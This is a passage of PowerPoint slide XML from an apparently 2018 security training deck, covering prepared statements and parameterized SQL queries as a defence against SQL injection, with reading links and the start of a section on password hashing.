              <a:ext cx="1933576" cy="11546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004380"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="707" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-139700" y="1176337"/>
            <a:ext cx="8281988" cy="1933576"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8281987" cy="1933575"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="705" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2645"/>
              <a:ext cx="7128934" cy="1928285"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1E293A"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="706" name="Triangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="6737879" y="389466"/>
              <a:ext cx="1933576" cy="11546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1E293A"/>
            </a:solid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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="708" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-27120" y="6733190"/>
            <a:ext cx="24438241" cy="1428338"/>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709" name="Prepare         Optimize         Execute"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="796885">
              <a:defRPr sz="10864"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prepare         Optimize</a:t>
            </a:r>
            <a:r>
              <a:t>         Execute</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="710"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71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712" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714" name="bind(:name, 'rich')"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8349319" y="6982221"/>
            <a:ext cx="5362676"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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>bind</a:t>
            </a:r>
            <a:r>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>:name</a:t>
            </a:r>
            <a:r>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'rich'</a:t>
            </a:r>
            <a:r>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715" name="Application binds values for the parameters at runtime."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3209013" y="4556228"/>
            <a:ext cx="17965974"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800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Application binds values for the parameters at runtime.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="716" name="DBMS executes with those parameters."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5645763" y="9306614"/>
            <a:ext cx="13092473"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800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>DBMS executes with those parameters.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701"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="701"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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1" grpId="1"/>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Benefits"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Benefits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="721" name="Resilient to SQL injection.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Resilient to SQL injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Compiling and optimization only done once.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Statement can be executed multiple times.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="722"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72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724" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="725"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9" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-111787" y="3879468"/>
            <a:ext cx="24607574" cy="7250495"/>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730" name="Example"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="731"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732"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733" name="PUBLIC"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>PUBLIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="734" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="735" name="custName = &quot;rich&quot;;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2862522" y="4283677"/>
            <a:ext cx="18658956" cy="6442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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>custName</a:t>
            </a:r>
            <a:r>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"rich"</a:t>
            </a:r>
            <a:r>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>qry</a:t>
            </a:r>
            <a:r>
              <a:t>  = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"SELECT * FROM users WHERE name=:name"</a:t>
            </a:r>
            <a:r>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:t> = prepareStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>qry</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:t>.bindParams</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>:name</a:t>
            </a:r>
            <a:r>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>custName</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>results</a:t>
            </a:r>
            <a:r>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:t>.execute</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="736" name="PSEUDOCODE"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="42774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PSEUDOCODE</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0" name="Additional Reading"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          Additional Reading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="741" name="http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996553" y="4389304"/>
            <a:ext cx="22390894" cy="7469321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="580319" indent="-580319" defTabSz="772239">
              <a:spcBef>
                <a:spcPts val="5500"/>
              </a:spcBef>
              <a:defRPr sz="4700"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="580319" indent="-580319" defTabSz="772239">
              <a:spcBef>
                <a:spcPts val="5500"/>
              </a:spcBef>
              <a:defRPr sz="4700"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="580319" indent="-580319" defTabSz="772239">
              <a:spcBef>
                <a:spcPts val="5500"/>
              </a:spcBef>
              <a:defRPr sz="4700"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>http://www.sqlinjection.net/time-based/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="580319" indent="-580319" defTabSz="772239">
              <a:spcBef>
                <a:spcPts val="5500"/>
              </a:spcBef>
              <a:defRPr sz="4700"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId6" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Blind_SQL_Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="580319" indent="-580319" defTabSz="772239">
              <a:spcBef>
                <a:spcPts val="5500"/>
              </a:spcBef>
              <a:defRPr sz="4700"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId7" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://ckarande.gitbooks.io/owasp-nodegoat-tutorial/content/tutorial/a1_-_sql_and_nosql_injection.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="742" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="21"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74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744" name="PUBLIC"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>PUBLIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="745" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="746" name="book (1).png" descr="book (1).png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="946811"/>
            <a:ext cx="3036094" cy="3036095"/>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0" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.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75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752" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="753" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="754" name="storing_passwords.png" descr="storing_passwords.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10581486" y="4557826"/>
            <a:ext cx="13566474" cy="8623471"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="755" name="Storing Passwords"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869950" y="4536281"/>
            <a:ext cx="22644099" cy="464343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gn="l">
              <a:defRPr sz="11200">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Storing Passwords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9" name="Hashing"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Hashing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="760"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76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762" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
